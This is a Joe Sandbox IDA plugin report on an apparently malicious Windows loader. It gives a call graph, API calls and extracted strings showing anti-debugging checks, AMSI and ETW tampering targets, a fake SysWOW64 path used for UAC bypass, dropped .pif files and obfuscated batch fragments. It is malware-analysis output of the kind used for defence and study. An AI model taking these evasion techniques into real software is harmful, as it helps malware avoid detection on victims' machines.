call 289e37c 1917->1948 1952 28b1d4c-28b1dba call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 1948->1952 1976 28b1dbf-28b1dc6 call 28a881c 1952->1976 1980 28b1dcb-28b1e42 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 1976->1980 2008 28b1e47-28b1e53 call 289e37c 1980->2008 2012 28b1e58-28b1ec6 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 2008->2012 2048 28b1ecb-28b1ed2 call 28a881c 2012->2048 2377 28b37ea-28b3e99 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 2894798 call 289494c call 28a7b90 call 28a8798 call 289480c call 289494c call 2894798 call 289494c call 28a7b90 call 28a8798 call 28a8704 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2897e10 2013->2377 2378 28b378f-28b37e5 call 28ae5cc call 2894d8c call 2894734 call 2894d8c call 28adf00 2013->2378 2660 28b70ec-28b7367 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894898 2014->2660 2661 28b5904-28b5949 call 289480c call 289494c call 28946a4 call 2897e10 2014->2661 2054 28b1ed7-28b1f4e call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 2048->2054 2096 28b1f53-28b1f64 call 289e37c 2054->2096 2102 28b1f69-28b1fe7 call 28a1768 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 2096->2102 2144 28b1fec-28b1ff3 call 28a881c 2102->2144 2150 28b1ff8-28b2063 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 2144->2150 2186 28b2068-28b2095 call 28a881c CoUninitialize call 289480c 2150->2186 2198 28b209a-28b2184 call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 2186->2198 2279 28b218b-28b2190 2198->2279 2280 28b2186-28b2189 2198->2280 2279->1662 2283 28b2196-28b23a1 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28aef70 call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 2279->2283 2280->2279 2283->1662 2902 28b3e9b-28b3edc call 2894d8c * 2 call 2894734 call 28adf00 2377->2902 2903 28b3ee1-28b40a8 call 28a8704 call 28ae974 call 2894798 call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 2897e10 2377->2903 2378->2377 2878 28b736d-28b79bf call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894798 call 289494c call 28a8408 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289494c call 28946a4 call 28aac30 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28936a0 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 2660->2878 2879 28b7e9c-28b809b call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894898 2660->2879 2661->2660 2687 28b594f-28b6065 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894d8c * 2 call 2894734 call 28adf00 2661->2687 3576 28b606a-28b6269 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894898 2687->3576 3850 28b79c1-28b79c4 2878->3850 3851 28b79c6-28b7c88 call 28a5a6c call 2894b78 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28949a4 call 28a7dd0 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28aaf50 2878->3851 3124 28b80a1-28b8274 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894798 call 289494c call 2894d20 call 2894d9c CreateProcessAsUserW 2879->3124 3125 28b8f25-28b90a8 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894898 2879->3125 2902->2903 3143 28b40aa-28b4100 call 28ae5cc call 2894d8c call 2894734 call 2894d8c call 28adf00 2903->3143 3144 28b4105-28b4533 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 28ae974 call 2894798 call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2897e10 2903->3144 3395 28b82f2-28b83fd call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 3124->3395 3396 28b8276-28b82ed call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 3124->3396 3359 28b90ae-28b90bd call 2894898 3125->3359 3360 28b9854-28bae59 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c * 16 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28a7b90 call 28a8184 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c ExitProcess 3125->3360 3143->3144 3879 28b457b-28b49c4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 2897e10 3144->3879 3880 28b4535-28b4576 call 2894d8c * 2 call 2894734 call 28adf00 3144->3880 3359->3360 3380 28b90c3-28b9396 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae974 call 289480c call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2897e10 3359->3380 3882 28b964e-28b984f call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28949a4 call 28a8ba8 3380->3882 3883 28b939c-28b9649 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894d8c * 2 call 2894734 call 28adf00 3380->3883 3586 28b83ff-28b8402 3395->3586 3587 28b8404-28b8724 call 28949a4 call 28ae0c4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28acf9c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 3395->3587 3396->3395 3952 28b626f-28b64c8 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 2894d20 call 2894d8c call 2894734 call 28adf00 3576->3952 3953 28b64cd-28b6bf0 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28936a0 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 2892f08 call 2897944 call 2894798 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2892f08 call 2897944 call 2894798 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 28936d0 3576->3953 3586->3587 4214 28b873d-28b8f20 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c ResumeThread call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c CloseHandle call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a7ecc call 28a8798 * 6 CloseHandle call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 3587->4214 4215 28b8726-28b8738 call 28a857c 3587->4215 3850->3851 4487 28b7c8d-28b7ca4 call 28936d0 3851->4487 4674 28b4a21-28b4c7a call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 289480c call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 2897e10 3879->4674 4675 28b49c6-28b4a1c call 28ae5cc call 2894d8c call 2894734 call 2894d8c call 28adf00 3879->4675 3880->3879 3882->3360 3883->3882 3952->3953 4214->3125 4215->4214 4956 28b4c7c-28b4cd2 call 28ae5cc call 2894d8c call 2894734 call 2894d8c call 28adf00 4674->4956 4957 28b4cd7-28b50a7 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a8704 call 289494c call 28a8408 Sleep call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894d20 call 28ade78 call 2894d20 call 28ade78 call 289480c call 289494c * 2 MoveFileA call 289480c call 289494c * 2 MoveFileA call 289494c call 2894d20 call 28ade78 call 289494c call 2894d20 call 28ade78 call 289494c call 2894d20 call 28ade78 4674->4957 4675->4674 4956->4957 4957->2014
                      APIs
                      • InetIsOffline.URL(00000000,00000000,028BB3D5,?,?,?,000002F7,00000000,00000000), ref: 028AF0E2
                        • Part of subcall function 028A881C: LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                        • Part of subcall function 028A881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                        • Part of subcall function 028A881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A881C: FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                        • Part of subcall function 028AEFC8: GetModuleHandleW.KERNEL32(KernelBase,?,028AF3CC,UacInitialize,028F237C,028BB40C,UacScan,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString), ref: 028AEFCE
                        • Part of subcall function 028AEFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 028AEFE0
                        • Part of subcall function 028AF024: GetModuleHandleW.KERNEL32(KernelBase), ref: 028AF034
                        • Part of subcall function 028AF024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 028AF046
                        • Part of subcall function 028AF024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 028AF05D
                        • Part of subcall function 02897E10: GetFileAttributesA.KERNEL32(00000000,?,028AFD00,ScanString,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString,028F237C,028BB40C,UacScan,028F237C,028BB40C,UacInitialize), ref: 02897E1B
                        • Part of subcall function 0289C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029E68C8,?,028B0032,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession), ref: 0289C2FB
                        • Part of subcall function 028ADFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE01F
                        • Part of subcall function 028ADFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE04F
                        • Part of subcall function 028ADFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028AE064
                        • Part of subcall function 028ADFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028AE090
                        • Part of subcall function 028ADFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028AE099
                        • Part of subcall function 02897E34: GetFileAttributesA.KERNEL32(00000000,?,028B2E7D,ScanString,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,Initialize), ref: 02897E3F
                        • Part of subcall function 02897FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,028B301B,OpenSession,028F237C,028BB40C,ScanString,028F237C,028BB40C,Initialize,028F237C,028BB40C,ScanString,028F237C,028BB40C), ref: 02897FD5
                        • Part of subcall function 028ADF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADFD2), ref: 028ADF3F
                        • Part of subcall function 028ADF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028ADF79
                        • Part of subcall function 028ADF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028ADFA6
                        • Part of subcall function 028ADF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028ADFAF
                        • Part of subcall function 028A8798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize,028F23A4,028AA774,UacScan), ref: 028A87AC
                        • Part of subcall function 028A8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028A87C6
                        • Part of subcall function 028A8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize), ref: 028A8802
                        • Part of subcall function 028A8704: LoadLibraryW.KERNEL32(amsi), ref: 028A870D
                        • Part of subcall function 028A8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 028A876C
                      • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,028BB764), ref: 028B4DEB
                        • Part of subcall function 028ADE78: RtlInitUnicodeString.NTDLL(?,?), ref: 028ADEA0
                        • Part of subcall function 028ADE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADEF2), ref: 028ADEB6
                        • Part of subcall function 028ADE78: NtDeleteFile.NTDLL(?), ref: 028ADED5
                      • MoveFileA.KERNEL32(00000000,00000000), ref: 028B4FEB
                      • MoveFileA.KERNEL32(00000000,00000000), ref: 028B5041
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                      • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteV